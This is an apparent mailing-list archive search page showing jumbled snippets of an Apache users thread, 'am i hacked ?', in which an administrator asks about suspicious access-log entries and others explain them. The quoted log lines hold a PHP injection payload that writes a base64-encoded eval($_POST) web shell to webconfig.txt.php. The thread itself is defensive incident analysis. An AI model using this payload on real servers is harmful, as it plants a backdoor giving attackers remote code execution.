with the current number of critters around probably yes.
E
On 6 February 2017 at 23:05, Wim Lewis wrote:
>
> On 2/6/2017 8:36 AM, Jack Swan wrote:
> > What upsets me is that these two requests have statuscode 200, which
> mean it was successfull.
>
> As Jonesy points out,
On 2/6/2017 8:36 AM, Jack Swan wrote:
> What upsets me is that these two requests have statuscode 200, which mean it
> was successfull.
As Jonesy points out, it's normal for the web server to simply ignore a
request's query-string in a request where it wouldn't mean anything. So Apache
is
quot;);@set_magic_quotes_runtime();echo
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
'|<-';
- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Mo
- On Feb 6, 2017, at 8:22 PM, Bernd Lentes
bernd.len...@helmholtz-muenchen.de wrote:
>> OK. I think i understand most of it.
>> First the attacker sets some values appropriate for him. Then he tries to
>> create
>> a file webconfig.txt.php and to write
>> in it.
>> Fortunately wwwrun
> OK. I think i understand most of it.
> First the attacker sets some values appropriate for him. Then he tries to
> create
> a file webconfig.txt.php and to write
> in it.
> Fortunately wwwrun can't write in /sr/www ... , following
> http://httpd.apache.org/docs/2.2/misc/security_tips.html
- On Feb 6, 2017, at 6:32 PM, Bernd Lentes
bernd.len...@helmholtz-muenchen.de wrote:
> - On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:
>
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the
On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krog wrote:
> I see these type of attack strings all the time on Nginx except Nginx gives
> a 403. Apache is notoriously bad with security and giving 200 ok responses
> makes you yourself. A reason I and many other people
- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:
> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
>
>
>
> I didn't decode the remaining lines. I think they're just trying to do the
>
I see these type of attack strings all the time on Nginx except Nginx gives
a 403. Apache is notoriously bad with security and giving 200 ok responses
makes you yourself. A reason I and many other people have switched.
User support on this list was also non existent when I ran into serious
On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
The first line is trying to create the file webconfig.txt.php in your
DOCUMENT_ROOT directory, with the contents of the file being:
I didn't decode the remaining lines. I think they're just trying to do
the same
thing.
Fortunately there is
> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
>
>
>
> I didn't decode the remaining lines. I think they're just trying to do the
> same
> thing.
>
Fortunately there is no webconfig.txt.php. And all
- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote:
> Actually now that I re-read the requests it also looks as shellshock succesful
> attempt.
> Operative system software not updated recently either?
> 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > :
>> Have you
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern
Subject: Re: [users@httpd] am i hacked ?
- On Feb 6, 2017, at 5:14 PM, Bernd Lentes
bernd.len...@helmholtz-muenchen.de wrote:
> Hi,
>
> just in the moment i found two very weird entri
Actually now that I re-read the requests it also looks as shellshock
succesful attempt.
Operative system software not updated recently either?
2017-02-06 17:42 GMT+01:00 Daniel :
> Have you tried to send those requests yourself and see what you get?
>
> Still those requests
Have you tried to send those requests yourself and see what you get?
Still those requests seem to be aimed at your php framework.
Do you use a very old php version as well?
2017-02-06 17:41 GMT+01:00 Lentes, Bernd :
>
> - On Feb 6, 2017, at 5:14 PM,
- On Feb 6, 2017, at 5:14 PM, Bernd Lentes
bernd.len...@helmholtz-muenchen.de wrote:
> Hi,
>
> just in the moment i found two very weird entries in may access_log:
>
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
>
04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?
Hi,
just in the moment i found two very weird entries in may access_log:
91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quo
Hi,
just in the moment i found two very weird entries in may access_log:
91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET
18 matches
Mail list logo